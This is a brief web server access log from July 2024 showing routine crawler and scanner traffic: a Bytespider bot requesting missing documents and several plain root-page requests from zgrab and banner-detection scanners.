185.191.126.213 - - [23/Jul/2024:00:10:54 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
103.203.57.7 - - [23/Jul/2024:00:27:06 +0200] "GET / HTTP/1.1" 200 423 "-" "HTTP Banner Detection (https://security.ipip.net)"
156.59.198.136 - - [23/Jul/2024:00:33:55 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12022465.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jul/2024:00:40:25 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10748267.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jul/2024:00:43:05 +0200] "GET /renault.2web.at/htdocs/binaries/10231946.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.189 - - [23/Jul/2024:00:48:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
185.191.126.213 - - [23/Jul/2024:01:00:00 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [23/Jul/2024:01:06:48 +0200] "GET /document.xml HTTP/1.0" 404 286 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.174.191.28 - - [23/Jul/2024:01:08:33 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
193.138.195.163 - - [23/Jul/2024:01:28:34 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0"
156.59.198.136 - - [23/Jul/2024:01:39:05 +0200] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/NEWS.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jul/2024:01:46:04 +0200] "GET /ed-test.2web.at/stats/lang/awstats-bg.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jul/2024:01:49:36 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10637459.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"